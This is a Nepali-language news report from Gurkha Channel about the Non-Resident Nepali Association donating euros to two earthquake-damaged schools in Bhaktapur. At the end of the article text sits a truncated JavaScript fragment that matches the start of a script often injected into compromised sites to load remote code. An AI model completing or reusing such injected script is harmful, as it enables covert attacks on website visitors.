भक्तपुरका भूकम्पप्रभावित विद्यालय पुनःनिर्माणमा एनआरएनको सहयोग

admin Avatar

गैरआवासीय नेपाली संघले भक्तपुरका भूकम्प प्रभावित दुई सरकारी विद्यालयलाई भवन निर्माणका लागि रकम सहयोग गरेको छ । संघका उपाध्यक्ष भवन भट्ट र सचिव अर्जुनकुमार श्रेष्ठले भक्तपुरको सूर्यविनायक नगरपालिकास्थित सन्तकृष्ण प्राविलाई दुई हजार पाँच सय युरो (करिब रु तीन लाख) र भक्तपुर नगरपालिका–११ तौमढीस्थित वरदायिणी निमाविलाई एक हजार पाँच सय युरो (करिब रु दुई लाख) आर्थिक सहयोग हस्तान्तरण गरेका हुन् ।

रकम हस्तान्तरण गर्दै संघका उपाध्यक्ष भट्टले भूकम्पले क्षतिग्रस्त विद्यालय भवन निर्माणमा सरकारले पुनःनिर्माण गर्न नसक्ने भएकाले एनआरएनले यस्ता एक हजार वटा विद्यालय भवनको पुनःनिर्माणमा सहयोग गर्ने बताउनुभयो ।

त्यस्तै संघका सचिव अर्जुनकुमार श्रेष्ठले विदेशी विद्यालयसँग नेपालका विद्यालयले सम्बन्ध विस्तार गर्न सके नेपालको शैक्षिक तथा पर्यटन प्रवद्र्धनमा ठूलो टेवा पुग्ने विश्वास व्यक्त गर्नुभयो । ]var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories